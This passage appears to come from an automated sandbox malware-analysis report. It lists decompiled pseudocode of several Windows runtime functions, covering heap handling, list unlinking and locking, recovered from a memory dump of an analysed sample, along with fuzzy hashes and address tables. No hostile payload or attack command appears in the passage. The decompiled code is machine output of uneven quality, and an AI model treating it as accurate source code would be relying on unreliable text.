                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                                                            • Instruction ID: b9659e01770a39f41b25e47517eaa7050f907fb4412fc737c2ea28ee892e999c
                                                                                                            • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                                                            • Instruction Fuzzy Hash: 9F21D432705781DFE726AB29C944B657BE8EF44350F1904E1DDC48B692D734DC41C6A0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0109FD9B Relevance: .1, Instructions: 69COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 93%
                                                                                                            			E0109FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E010776E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L01084620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                                                                                            0x0109fd9b
                                                                                                            0x0109fda0
                                                                                                            0x0109fda1
                                                                                                            0x0109fdab
                                                                                                            0x0109fdad
                                                                                                            0x0109fdb0
                                                                                                            0x0109fdb8
                                                                                                            0x0109fe0f
                                                                                                            0x0109fde6
                                                                                                            0x0109fde9
                                                                                                            0x0109fdec
                                                                                                            0x010dc0c0
                                                                                                            0x0109fdfe
                                                                                                            0x0109fe06
                                                                                                            0x0109fe06
                                                                                                            0x010dc0c8
                                                                                                            0x0109fe2d
                                                                                                            0x0109fe2d
                                                                                                            0x00000000
                                                                                                            0x0109fe2d
                                                                                                            0x010dc0d1
                                                                                                            0x010dc0e0
                                                                                                            0x010dc0e5
                                                                                                            0x010dc0e5
                                                                                                            0x010dc0e8
                                                                                                            0x00000000
                                                                                                            0x010dc0e8
                                                                                                            0x0109fdf4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0109fdf6
                                                                                                            0x0109fdfa
                                                                                                            0x0109fe1a
                                                                                                            0x0109fe1f
                                                                                                            0x0109fe1f
                                                                                                            0x0109fdfc
                                                                                                            0x00000000
                                                                                                            0x0109fdfc
                                                                                                            0x0109fdcc
                                                                                                            0x0109fdd0
                                                                                                            0x0109fe26
                                                                                                            0x00000000
                                                                                                            0x0109fe26
                                                                                                            0x0109fdd8
                                                                                                            0x0109fddb
                                                                                                            0x0109fddd
                                                                                                            0x0109fde0
                                                                                                            0x00000000

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                                                            • Instruction ID: 46ca7ad8df85d231f5129efed72bb40d1bcd8a6c93f9474745c22b10c8308558
                                                                                                            • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                                                            • Instruction Fuzzy Hash: 2D217C72A05642DBDB31DF0DC650A66BBE6EB98B10F2485AEE996C7611D7309C00EB80
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0109B390 Relevance: .1, Instructions: 63COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 54%
                                                                                                            			E0109B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E01082280(_t12, 0x1158608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E010A00C2(0x1158608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                                                                                            0x0109b395
                                                                                                            0x0109b3a2
                                                                                                            0x0109b3a5
                                                                                                            0x0109b3aa
                                                                                                            0x0109b3b2
                                                                                                            0x0109b3ba
                                                                                                            0x0109b3bd
                                                                                                            0x0109b3c0
                                                                                                            0x0109b3c4
                                                                                                            0x0109b3c9
                                                                                                            0x010da3e9
                                                                                                            0x010da3ed
                                                                                                            0x010da3f0
                                                                                                            0x010da3ff
                                                                                                            0x010da403
                                                                                                            0x010da409
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010da40b
                                                                                                            0x010da40b
                                                                                                            0x010da40f
                                                                                                            0x010da415
                                                                                                            0x010da423
                                                                                                            0x010da423
                                                                                                            0x010da415
                                                                                                            0x0109b3d1
                                                                                                            0x0109b3e8
                                                                                                            0x0109b3e8
                                                                                                            0x0109b3d9

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e0a518ca82c8391c713f1b55a30649a9cf30e84ec2964eabf0505630cd570758
                                                                                                            • Instruction ID: 34573a293ec79591643ccf3b1a57c69c615d5c001d191348fc33911e3055a840
                                                                                                            • Opcode Fuzzy Hash: e0a518ca82c8391c713f1b55a30649a9cf30e84ec2964eabf0505630cd570758
                                                                                                            • Instruction Fuzzy Hash: B0116B33305210DFCB19DA199E81A6F76A7EBC5330B24C179EDA6D7380CE319C02C694
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01069240 Relevance: .1, Instructions: 63COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 77%
                                                                                                            			E01069240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x113f708);
				E010BD08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E010A95D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E010A95D0();
				_t33 =  *0x11584c4; // 0x0
				L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x11584c4; // 0x0
				L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x11584c4; // 0x0
				E01082280(L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x11586b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E010A95D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E010A95D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E01069325();
					_t50 =  *0x11584c4; // 0x0
					return E010BD0D1(L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                                                                                            0x01069240
                                                                                                            0x01069242
                                                                                                            0x01069247
                                                                                                            0x0106924c
                                                                                                            0x0106924e
                                                                                                            0x01069255
                                                                                                            0x01069257
                                                                                                            0x0106925a
                                                                                                            0x0106925f
                                                                                                            0x0106925f
                                                                                                            0x01069266
                                                                                                            0x01069271
                                                                                                            0x01069276
                                                                                                            0x01069279
                                                                                                            0x0106927e
                                                                                                            0x01069295
                                                                                                            0x0106929a
                                                                                                            0x010692b1
                                                                                                            0x010692b6
                                                                                                            0x010692d7
                                                                                                            0x010692dc
                                                                                                            0x010692e0
                                                                                                            0x010692e6
                                                                                                            0x010692e8
                                                                                                            0x010692ee
                                                                                                            0x01069332
                                                                                                            0x01069333
                                                                                                            0x01069337
                                                                                                            0x01069338
                                                                                                            0x0106933a
                                                                                                            0x0106933a
                                                                                                            0x0106933d
                                                                                                            0x01069342
                                                                                                            0x01069342
                                                                                                            0x01069345
                                                                                                            0x01069349
                                                                                                            0x0106934e
                                                                                                            0x01069352
                                                                                                            0x01069357
                                                                                                            0x010692f4
                                                                                                            0x010692f4
                                                                                                            0x010692f6
                                                                                                            0x010692f9
                                                                                                            0x01069300
                                                                                                            0x01069306
                                                                                                            0x01069324
                                                                                                            0x01069324

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 57fa6b2b4b227c0f9f52c5519b8728d061ea05c8be2ef10b67d6af46104b6ee3
                                                                                                            • Instruction ID: 3b20626d6efba32f14534a4f215b42ca16194368085cc6057e30ca9f25311570
                                                                                                            • Opcode Fuzzy Hash: 57fa6b2b4b227c0f9f52c5519b8728d061ea05c8be2ef10b67d6af46104b6ee3
                                                                                                            • Instruction Fuzzy Hash: ED213931151642DFC766FF68CA40F99B7F9FF18708F14456CE09986AA2CB34E941CB44
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010F4257 Relevance: .1, Instructions: 60COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 90%
                                                                                                            			E010F4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x11408d0);
				E010BD08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E010F41E8(__ebx, __edi, __ecx, _t39);
				E0107EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x11587e4;
					_t18 =  *0x11587e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x1155cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x11587e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x11587e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L01067055(_t31 + 0xfffffff8);
								_t24 =  *0x11587e0; // 0x0
								_t18 = _t24 - 1;
								 *0x11587e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x1155cd0;
				if( *0x1155cd0 <= 0) {
					L01067055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x11587e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x11587e8 = _t30;
						 *0x11587e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E010BD0D1(L010F4320());
			}















                                                                                                            0x010f4257
                                                                                                            0x010f4257
                                                                                                            0x010f4257
                                                                                                            0x010f4259
                                                                                                            0x010f425e
                                                                                                            0x010f4263
                                                                                                            0x010f4265
                                                                                                            0x010f4273
                                                                                                            0x010f4278
                                                                                                            0x010f427c
                                                                                                            0x010f427f
                                                                                                            0x010f4281
                                                                                                            0x010f4287
                                                                                                            0x010f42d7
                                                                                                            0x010f42d7
                                                                                                            0x010f42da
                                                                                                            0x010f428d
                                                                                                            0x010f428d
                                                                                                            0x010f428f
                                                                                                            0x010f4292
                                                                                                            0x010f4297
                                                                                                            0x010f429c
                                                                                                            0x010f42a0
                                                                                                            0x010f42a6
                                                                                                            0x010f42a8
                                                                                                            0x010f42ae
                                                                                                            0x010f42b3
                                                                                                            0x00000000
                                                                                                            0x010f42ba
                                                                                                            0x010f42ba
                                                                                                            0x010f42bf
                                                                                                            0x010f42c5
                                                                                                            0x010f42ca
                                                                                                            0x010f42cf
                                                                                                            0x010f42d0
                                                                                                            0x00000000
                                                                                                            0x010f42d0
                                                                                                            0x010f42b3
                                                                                                            0x00000000
                                                                                                            0x010f42a6
                                                                                                            0x010f429c
                                                                                                            0x010f42dc
                                                                                                            0x010f42dc
                                                                                                            0x010f42e3
                                                                                                            0x010f4309
                                                                                                            0x010f42e5
                                                                                                            0x010f42e5
                                                                                                            0x010f42e8
                                                                                                            0x010f42ee
                                                                                                            0x010f42f0
                                                                                                            0x00000000
                                                                                                            0x010f42f2
                                                                                                            0x010f42f2
                                                                                                            0x010f42f4
                                                                                                            0x010f42f7
                                                                                                            0x010f42f9
                                                                                                            0x010f4300
                                                                                                            0x010f4300
                                                                                                            0x010f42f0
                                                                                                            0x010f430e
                                                                                                            0x010f431f

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 794605df6b006f25fc058405ed2c70d79aaa8b2b91988c2fc63313fa34ba3a20
                                                                                                            • Instruction ID: 16bedf3f728106440804dfd1d0340a4fe5184b4e605120e225123266d3216bc2
                                                                                                            • Opcode Fuzzy Hash: 794605df6b006f25fc058405ed2c70d79aaa8b2b91988c2fc63313fa34ba3a20
                                                                                                            • Instruction Fuzzy Hash: C921AE74900B01CFC7A9DF69D101695BBF1FB45318B9082BED6A5CBA95D731D491CF00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01092397 Relevance: .1, Instructions: 59COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 29%
                                                                                                            			E01092397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x115848c != 0) {
					L0108FAD0(0x1158610);
					if( *0x115848c == 0) {
						E0108FA00(0x1158610, _t19, _t27, 0x1158610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E01092581(0x1158610, 0x10450a0, _t26, _t27, _t28);
						E0108FA00(0x1158610, 0x10450a0, _t27, 0x1158610);
					}
				} else {
					L1:
					_t11 =  *0x1158614; // 0x0
					if(_t11 == 0) {
						_t11 = E010A4886(0x1041088, 1, 0x1158614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E01092581(0x1158610, (_t11 << 4) + 0x1045070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                                                                                                            0x010923b0
                                                                                                            0x010923b6
                                                                                                            0x01092409
                                                                                                            0x01092415
                                                                                                            0x010d5ae9
                                                                                                            0x00000000
                                                                                                            0x0109241b
                                                                                                            0x0109241b
                                                                                                            0x0109241d
                                                                                                            0x01092427
                                                                                                            0x0109242e
                                                                                                            0x01092430
                                                                                                            0x01092430
                                                                                                            0x010923b8
                                                                                                            0x010923b8
                                                                                                            0x010923b8
                                                                                                            0x010923bf
                                                                                                            0x010923fc
                                                                                                            0x010923fc
                                                                                                            0x010923c1
                                                                                                            0x010923c3
                                                                                                            0x010923d0
                                                                                                            0x010923d8
                                                                                                            0x010923d8
                                                                                                            0x010923dc
                                                                                                            0x010923de
                                                                                                            0x010923e1
                                                                                                            0x010923e1
                                                                                                            0x010923ec

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 11502b5352da62356136a65fb361af45e368a20e75658bbc3803606b7c525304
                                                                                                            • Instruction ID: c3326f3b431cb82d4717704c1fbd263cc4ea25b7ef7250b0fd5b7e7d744376df
                                                                                                            • Opcode Fuzzy Hash: 11502b5352da62356136a65fb361af45e368a20e75658bbc3803606b7c525304
                                                                                                            • Instruction Fuzzy Hash: 32112B71744301B7EB74A63EDC90B59B6D8BBA0660F14C06AFAC2E7180CAB0E840D754
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010E46A7 Relevance: .1, Instructions: 59COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 93%
                                                                                                            			E010E46A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L01084620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E010AF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E0109D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L010877F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                                                                                                            0x010e46b7
                                                                                                            0x010e46ba
                                                                                                            0x010e46c5
                                                                                                            0x010e46c8
                                                                                                            0x010e46d0
                                                                                                            0x010e46d4
                                                                                                            0x010e46e6
                                                                                                            0x010e46e9
                                                                                                            0x010e46f4
                                                                                                            0x010e46ff
                                                                                                            0x010e4705
                                                                                                            0x010e4706
                                                                                                            0x010e470c
                                                                                                            0x010e4713
                                                                                                            0x010e471b
                                                                                                            0x010e4723
                                                                                                            0x010e4725
                                                                                                            0x010e46d6
                                                                                                            0x010e46d9
                                                                                                            0x010e46db
                                                                                                            0x010e46db
                                                                                                            0x010e4732

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                                            • Instruction ID: b32f66d99c1aaf30e0e2e827027c598e283c00904ff121d3dc59f7a87f88dfbb
                                                                                                            • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                                            • Instruction Fuzzy Hash: 63110272504208BFCB01AF5DD8808BEBBB9EF99304F1080AAF984C7350DA318D51D7A5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0106C962 Relevance: .1, Instructions: 57COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 42%
                                                                                                            			E0106C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				char _t22;
				intOrPtr _t26;
				intOrPtr _t27;
				char _t32;
				char _t34;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x115d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E0107EEF0(0x11570a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E010EF625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E0107EB70(_t29, 0x11570a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E010AB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E010EF1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x11570c0; // 0x0
					while(_t38 != 0x11570c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x115b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                                                                                            0x0106c96a
                                                                                                            0x0106c974
                                                                                                            0x0106c988
                                                                                                            0x0106c98a
                                                                                                            0x010d7c9d
                                                                                                            0x010d7c9f
                                                                                                            0x010d7ca4
                                                                                                            0x010d7cae
                                                                                                            0x010d7cf0
                                                                                                            0x010d7cf5
                                                                                                            0x010d7cfa
                                                                                                            0x0106c992
                                                                                                            0x0106c996
                                                                                                            0x0106c997
                                                                                                            0x0106c998
                                                                                                            0x0106c9a3
                                                                                                            0x0106c9a3
                                                                                                            0x010d7cb0
                                                                                                            0x010d7cb7
                                                                                                            0x010d7cbb
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d7cbd
                                                                                                            0x010d7ce8
                                                                                                            0x010d7cc5
                                                                                                            0x010d7cc8
                                                                                                            0x010d7cca
                                                                                                            0x010d7cd0
                                                                                                            0x010d7cd6
                                                                                                            0x010d7cde
                                                                                                            0x010d7ce4
                                                                                                            0x010d7ce4
                                                                                                            0x010d7cd0
                                                                                                            0x00000000
                                                                                                            0x010d7ce8
                                                                                                            0x0106c990
                                                                                                            0x00000000

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5b250a3294cbf3db146a35fd78fc8f914de5b234ec697f327505a278879a9f02
                                                                                                            • Instruction ID: a997f4d2c1eb0e55ad7e37874b7ad4e49a5ce56be696fb509dbb0026e61b4ead
                                                                                                            • Opcode Fuzzy Hash: 5b250a3294cbf3db146a35fd78fc8f914de5b234ec697f327505a278879a9f02
                                                                                                            • Instruction Fuzzy Hash: C411023130070A9FC7A4AE29DC85A6BBBE5BF84218B40057CF9D583691DB20EC40CBD1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010A37F5 Relevance: .1, Instructions: 57COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 87%
                                                                                                            			E010A37F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E01082280(_t6, 0x1158550);
				}
				_t29 = E010A387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E0107FFB0(0x1158550, _t27, 0x1158550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                                                                                                            0x010a37fa
                                                                                                            0x010a37fc
                                                                                                            0x010a3805
                                                                                                            0x010a3808
                                                                                                            0x010a3808
                                                                                                            0x010a3814
                                                                                                            0x010a3818
                                                                                                            0x010a3846
                                                                                                            0x010a3848
                                                                                                            0x010a384b
                                                                                                            0x010a384b
                                                                                                            0x010a3852
                                                                                                            0x00000000
                                                                                                            0x010a3854
                                                                                                            0x010a3856
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010a3863
                                                                                                            0x00000000
                                                                                                            0x010a3863
                                                                                                            0x010a381a
                                                                                                            0x010a381a
                                                                                                            0x010a381f
